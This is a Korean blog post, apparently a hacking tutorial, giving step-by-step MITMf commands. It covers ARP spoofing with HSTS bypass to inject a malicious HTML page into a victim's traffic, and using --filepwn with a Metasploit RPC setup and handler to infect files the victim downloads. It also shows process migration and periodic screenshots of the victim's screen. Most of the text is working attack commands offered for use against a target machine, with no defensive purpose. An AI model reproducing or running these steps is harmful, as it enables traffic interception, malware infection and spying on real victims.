1.다른 웹사이트 자체를 해킹한다기 보다는 MITMF 공격에 악성코드를 넣은 index.html을 주입시킴으로써
해당 피해자가 해커의 사이트에 진입하여 감염 된 후 어느 사이트를 들어가던 해당 악성 index.html 화면이 아래에 보이게 됩니다.
service apache2 start 로 apache 서버를 실행시켜 준 뒤
# mitmf --spoof --arp --hsts -i eth0 --gateway 게이트웨이 주소 --target 피해자 컴퓨터 아이피주소 --inject --html-file /ver/www/html/index.html
해당 명령어를 사용해 주면 됩니다.
2.감염된 피해자가 인터넷에서 무언가를 다운로드 받을때 해당 다운로드 파일에 mitmf가 자동으로 악성코드를 주입하여 다운로드 받게 되어 감염시킬수 있도록 하는 기능입니다.
service postgresql start 로 db를 실행시켜 주시고
msfconsole로 들어가서 load msgrpc 를 들어가면 username과 password가 나옵니다.
mitmf 폴더로 들어가서 mitmf.conf 파일을 leafpad 등으로 열어주시고 Metasploit 부분의 rpcpass 부분의 비밀번호를 mitmf.conf의 password로 변경해 줍니다.
msfconsole -r handler.rc 로 핸들러를 실행시켜 주신 뒤
mitmf --spoof --arp --hsts -i eth0 --gateway 게이트웨이 주소 --target 피해자 컴퓨터 아이피주소 --filepwn 를 입력해 줍니다.
그러면 감염이 성공적으로 이루어지며 피해자 컴퓨터에서 아무 파일을 받아서 실행시켜주면 감염이 되어 msfconsole 핸들러에 잡히게 됩니다.
--- migrate [프로세스 아이디] 명령어를 이용해서 해당 프로그램으로 핸들링이 되는 것을 다른 프로세스로 옮길 수 있습니다. ex) migrate 1140
feat. 위 mitmf 명령어 뒤에 --upsidedownternet을 쳐주면 피해자의 웹사이트 이미지들이 모두 거꾸로 나오게 되는 장난을 칠수 있습니다!
ex)mitmf --spoof --arp --hsts -i eth0 --gateway 게이트웨이 주소 --target 피해자 컴퓨터 아이피주소 --upsidedownternet
+ 뒤에 --screen --interval 5 를 같이 넣어주면 5초마다 스크린샷을 찍어서 mitmf 폴더안의 logs 폴더 안에 저장하게됩니다!
'3. 웹 애플리케이션 취약점 진단' 카테고리의 다른 글
ip 주소만으로 해킹하기 [veil-catapult] (0) | 2023.12.27 |
---|---|
브라우저 피봇 - 아디와 비번없이 해킹하기 (0) | 2023.12.27 |
도스 공격하는 방법 feat. Ettercap (0) | 2023.12.27 |
피싱사이트 [어도비 업데이트 버튼 악성코드] html 코드 및 beef의 fake Flash Update 기능 (0) | 2023.12.27 |
계정을 해킹할때 사용하는 Man in the Middle 사용하기[mitmf] (0) | 2023.12.27 |